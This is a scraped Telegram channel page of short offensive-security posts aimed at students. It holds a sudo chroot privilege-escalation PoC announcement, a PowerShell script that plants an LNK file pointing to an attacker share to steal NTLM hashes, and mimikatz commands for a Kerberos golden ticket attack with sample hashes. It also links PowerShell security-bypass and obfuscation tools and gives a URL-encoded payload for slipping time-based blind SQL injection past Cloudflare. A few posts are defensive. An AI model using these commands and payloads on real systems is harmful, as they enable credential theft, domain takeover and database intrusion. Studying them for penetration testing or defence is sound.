SecList for CyberStudents – Telegram

SecList for CyberStudents

@SecListForCyberStudents

240 subscribers

601 photos

25 videos

211 files

915 links

Think outside the box

Download Telegram

About

Blog

Apps

Platform

SecList for CyberStudents

240 subscribers

SecList for CyberStudents

Forwarded from GigaHackers (Oleg Labyntsev)

[LPE Linux CVE-2025-32643]

Всем привет! 👋

На днях вышла информация об уязвимости CVE-2025-32643. Баг позволяет в результате манипуляции опцией sudo -R (--chroot) повысить привилегии до root. 🚨

Нам удалось подтвердить PoC в нескольких версиях sudo.
1️⃣ На первом рисунке можете увидеть, что версия 1.9.14p2 подвержена уязвимости. Сначала от непривилегированного пользователя не могли смотреть каталог /root, а после эксплуатации спокойно смогли перечислить содержимое;

2️⃣ Аналогично на втором рисунке версия sudo 1.9.15p2 также подвержена уязвимости;

3️⃣А вот на третьем рисунке видно, что версия sudo 1.9.13p3 не подвержена недостатку, так как до версии 1.9.14 необходимой функциональности не было.

Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до 1.9.17.p1
Подробнее о ресерче и приложенном PoC-е можно почитать здесь

#linux #pentest #LPE

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡1🔥1👾1

83 views07:50

SecList for CyberStudents

https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/cmedb.py

This tool database of crackmapexec. We can use it for show result of crackmapexec wonderful

⚡1🔥1👾1

107 viewsedited 16:33

SecList for CyberStudents

https://github.com/fin3ss3g0d/secretsdump.py

OR use imapacket-secretdump

87 viewsedited 18:00

SecList for CyberStudents

Token Impersonation

75 views19:39

SecList for CyberStudents

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\Your_IP\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Additional resources for forced authentication: https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication#execution-via-.rtf

#LNK_File_Attack

Forced Authentication | Red Team Notes

Credential Access, Stealing hashes

86 viewsedited 20:40

SecList for CyberStudents

1. mimikatz # privilege::debug

2. lsadump::lsa /inject /name:krbtgt

We need NTLM hash and sid

3. mimikatz # kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-1139169715-366527789-3857901133 /krbtgt:4793b8acca133d3b82c5c96438996d68 /id:500 /ptt

#Golden_Ticket_Attack

106 views17:04

SecList for CyberStudents

https://github.com/OmerYa/Invisi-Shell

#powershell #shell #bypass

GitHub - OmerYa/Invisi-Shell: Hide your Powershell script in plain sight. Bypass all Powershell security features

Hide your Powershell script in plain sight. Bypass all Powershell security features - OmerYa/Invisi-Shell

95 views20:32

SecList for CyberStudents

https://github.com/danielbohannon/Invoke-Obfuscation

GitHub - danielbohannon/Invoke-Obfuscation: PowerShell Obfuscator

PowerShell Obfuscator. Contribute to danielbohannon/Invoke-Obfuscation development by creating an account on GitHub.

93 views20:36

SecList for CyberStudents

https://github.com/samratashok/ADModule

GitHub - samratashok/ADModule: Microsoft signed ActiveDirectory PowerShell module

Microsoft signed ActiveDirectory PowerShell module - samratashok/ADModule

91 views21:20

SecList for CyberStudents

SecList for CyberStudents

https://github.com/samratashok/ADModule

95 views21:53

SecList for CyberStudents

BTL1 Blue Team Level 1, the blue team OSCP? An expletive laden review of the comprehensive defense fundamentals course, from someone who passed with 100% on their first attempt!
I passed on my first attempt with 100%, this is my review:https://medium.com/@seccult/btl1-blue-team-level-1-the-blue-team-oscp-3c09ca5f1f8c

Discuss on Reddit: https://ift.tt/OkCcf2r
@blueteamalerts

BTL1 Blue Team Level 1, the blue team OSCP?

I recently completed the BTL1 course material, and challenged, and passed the associated exam with a perfect 100%!

103 views03:19

SecList for CyberStudents

https://thehelk.com/intro.html

88 viewsedited 15:30

SecList for CyberStudents

PoC for CVE-2025-48799, an elevation of privilege vulnerability in Windows Update service.

https://github.com/Wh04m1001/CVE-2025-48799/

96 views21:10

SecList for CyberStudents

Account Management Events

97 views05:06

SecList for CyberStudents

When analyzing the Account Logon and Logon events on a DC keep an eye fot the following Event IDs.

104 views05:14

SecList for CyberStudents

Forwarded from Brut Security

🛡️ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi

When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!

❌ Blocked Payload

(select(0)from(select(sleep(10)))v) → 403 Forbidden

✅ Bypass Payload

(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)

🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.

✅Credit: @nav1n0x

83 views17:43